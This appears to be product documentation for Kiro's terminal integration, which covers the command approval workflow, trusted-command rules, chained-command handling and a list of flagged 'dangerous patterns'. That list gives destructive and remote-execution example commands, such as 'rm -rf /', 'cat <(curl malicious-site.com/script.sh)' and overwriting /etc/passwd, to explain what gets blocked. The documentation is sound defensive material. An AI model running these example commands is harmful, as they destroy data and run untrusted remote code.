Documentation

Terminal Integration

Copied!Overview

Transform your development workflow with Kiro's terminal integration. Instead of memorizing command syntax or switching between windows, describe what you want to accomplish and Kiro translates your requests into executable commands, maintains context across operations, and provides a secure approval system that keeps you in control while managing dependencies, navigating git workflows, or exploring your codebase.

Copied!Getting Started

Simply describe what you want to do in natural language. For example:

  • "Install the project dependencies"
  • "Check the git status"
  • "Find all TypeScript files in the src folder"
  • "Run the development server"

Kiro translates your request into the appropriate terminal command and asks for your approval before executing. You'll review the suggested command and choose to Modify, Reject, Run, or Run and Trust, then see the output directly in chat.

Loading image...
Kiro Terminal Request

Copied!How It Works

When Kiro suggests a command, you have four options:

  • Modify - Edit the command before running
  • Reject - Cancel execution
  • Run - Execute once
  • Run and Trust - Execute and trust similar commands in the future
Loading image...
Kiro Terminal Approval Workflow

Copied!Trust Commands

For security, Kiro asks for approval before running any command. You can streamline this process by configuring which commands to trust automatically.

Copied!Trust Read-Only Commands

Automatically run safe commands without prompts. Read-only commands are defined as commands where the root is either ls, cat, pwd, which, head, or tail. These commands are considered safe because they only read or display information without modifying the system or files.

Loading image...
Kiro Trust Read Only Command Setting

Copied!Trusted Commands

When Kiro prompts you to trust a command, you may be presented up to three options to trust it:

  • Full command - Trust only the exact command provided (e.g., npm run build)
  • Partial - Trust command variations (e.g., npm test *)
  • Base - Trust all commands with this root (e.g., npm *)
Loading image...
Kiro Trusted Commands Setting

Alternatively, you can manually configure trusted commands in Settings → Trusted Commands. These settings can be configured at both the user level (global across all workspaces) and workspace level (specific to your current project).

Loading image...
Kiro Trusted Commands Setting

Copied!Chained Commands

Kiro can automatically run commands chained with |, &&, or || if they match your trusted commands. Commands in chains can be validated through multiple trust patterns:

Trust Validation Options:

For a command like npm i && npm run build, it can be auto-run if your trusted command list contains any of:

  • Wildcard matching: npm * (trusts all npm commands)
  • Individual partial matching: npm i and npm run *
  • Individual full matching: npm i and npm run build
  • Full chained command: npm i && npm run build (exact match)

Important: Chaining patterns (|, &&, ||) without surrounding whitespace are treated as potentially dangerous and flagged for security review, while properly spaced commands are handled normally through the trust system.

Copied!Dangerous Patterns

For security best practices, certain command patterns are flagged as potentially dangerous and require manual review unless the exact command string has been explicitly trusted. Dangerous patterns are defined as commands containing any of the following characters or sequences:

  • <( - Process substitution
  • =( - Process substitution
  • $( - Command substitution
  • ` - Command substitution (backticks)
  • > - Output redirection
  • & - Background execution
  • ; - Command separator
  • \n - Command injection
  • $IFS - Variable obfuscation
  • |, &&, || - Chaining patterns without surrounding whitespace (potential obfuscation)

Examples

  • Command substitution: echo $(rm -rf /) or echo `malicious-script` - executes hidden code within the command
  • Process substitution: cat <(curl malicious-site.com/script.sh) - executes remote code as if it were a file
  • Command chaining: ls && rm -rf / or false || rm important-file - chains destructive commands
  • Command separation: ls; rm -rf / - runs multiple commands regardless of previous results
  • Output redirection: echo "data" > /etc/passwd - can overwrite critical system files
  • Background execution: malicious-script & - can hide processes running in the background
  • Obfuscation: echo "hello"|rm -rf / - can use improper chaining pattern spacing to hide destructive commands

These patterns are flagged because they can potentially chain commands, redirect output, or execute code in ways that might be unintended or harmful.

Copied!Advanced Usage

Copied!Using Terminal Context

Reference recent output from your active terminal in your conversations with #terminal. Important: #terminal always refers to the currently active/visible terminal window. If you have multiple terminals open, make sure the terminal you want to reference is active before using #terminal in your chat.

This feature allows Kiro to analyze command results, debug errors, and suggest solutions based on your actual terminal session.

Copied!Basic Usage

#terminal analyze the error from the last npm run build

Kiro maintains awareness of command history and outputs, enabling:

  • Error Analysis - Understanding why commands failed with specific error messages
  • Output Interpretation - Explaining complex command results and logs
  • Follow-up Actions - Suggesting next steps based on actual results
  • Pattern Recognition - Identifying recurring issues across multiple commands
  • Environment Debugging - Helping resolve system and dependency conflicts

Copied!Troubleshooting

For issues with terminal integration and manual setup instructions, see the Shell Integration troubleshooting guide.

Page updated: August 13, 2025